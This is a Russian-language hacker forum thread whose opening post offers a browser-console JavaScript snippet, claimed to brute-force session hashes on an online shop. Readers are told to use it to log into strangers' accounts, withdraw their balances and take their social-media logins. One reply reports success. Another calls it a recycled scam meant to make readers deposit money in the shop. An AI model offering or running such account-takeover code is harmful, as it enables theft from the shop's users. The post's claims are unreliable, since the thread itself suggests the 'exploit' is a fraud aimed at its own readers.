Зарабатываем на веб уязвимости

Plastic90

НАБЛЮДАТЕЛЬ
Регистрация
18.02.18
Сообщения
1
Реакции
1
Баллы
4
Профиль пользователя не подтвержден! Работа с ТС может быть не безопасна.
Всем здарова. Хайда в теме не будет, хотя тема очень-очень стоящая. На форуме у вас я новичок и хочу получить неплохую репутацию. Думаю, за подобный слив я это заслужу //applications/core/interface/js/spacer.png/emoticons/[email protected] 2x" width="20" height="20" data-src="/emoticons/default_smile.png">. Тема слита с приватного форума(С MAKHACK, который думаю большинству из вас известен). Не буду тянуть кота за яйца и сразу начнем. 
 
- Линкаемся на сайт darkshop.cc
- Далее нам нужно открыть console разработчика, а делается это следующим образом: 
Для браузеров Chrome или Opera + CNTRL + SHIFТ + J 
Для браузера Firefox CNТRL + SНIFТ + К. 
 
- В консоле вводим следующий JavaScript код для брута аккаунтов: 
КОД:
function start(){setTimeout(function(){$.get("lоgin.php?sys=session",function(t){t.indexOf("mb_log")>=0&&($("#check").html("Проверяется: "+t),$.get("login.php?check="+t,function(n){n.indexOf("true")>=0&&$("#log").append('<a target="_blank" href="login.php?hash='+t+'"> " купленных товаров" +"</a><br>")}))}),setTimeout(function(){start()},1)},5e3)}$(".content").html('<div id="check"></div><br><b>Валидные аккаунты: </b><div id="log"></div>'),start(),nA();

 
Если появилась подобная надпись: 
"Проверяется: UfIcUjms" 
Значит тема еще работает и мы можем логиниться под чужими аккаунтами. Примерно через минуту после ввода кода у нас начнут появляться ссылки для авторизации под чужим аккаунтом. С ними мы можем делать что захотим; 
- Выводить баланс 
- Находить полезные ништяки типа аккаунтов вк, фб, инсты, различных баз и прочей дряни. 
Надеюсь, вам понравится //applications/core/interface/js/spacer.png/emoticons/[email protected] 2x" width="20" height="20" data-src="/emoticons/default_smile.png">. 
 
P.S - Тема актуальна на 18.02.2018
 

Дровосек

НАБЛЮДАТЕЛЬ
Регистрация
25.02.18
Сообщения
2
Реакции
0
Баллы
3
Профиль пользователя не подтвержден! Работа с ТС может быть не безопасна.
Темка норм, протестил - получилось! Спасибо! Я тоже новичок, не знаю еще, как тут репу заработать, но тебе +в карму!!!

 

POVAR

НАБЛЮДАТЕЛЬ
Регистрация
26.02.18
Сообщения
6
Реакции
2
Баллы
4
Профиль пользователя не подтвержден! Работа с ТС может быть не безопасна.
охеренная многоходовочка

Вторым брутится акк с купленной за 20000 слитой уязвимостью интернет-магазина. Там в теме куча отличных отзывов.

но чтобы воспользоваться этой уязвимостью, надо сначала в этот магазин закинуть денег...

одна проблема: эту схему "сливают" еще с прошлого года

Но тонко, очень тонко...

Подробности нашел тут:

Изменился только адрес магазина с "уязвимостью", я смотрю

 

Glaz

НАБЛЮДАТЕЛЬ
Регистрация
11.03.18
Сообщения
10
Реакции
2
Баллы
17
Профиль пользователя не подтвержден! Работа с ТС может быть не безопасна.
Рабочая схема? Стоит качать?)

 
Сверху Снизу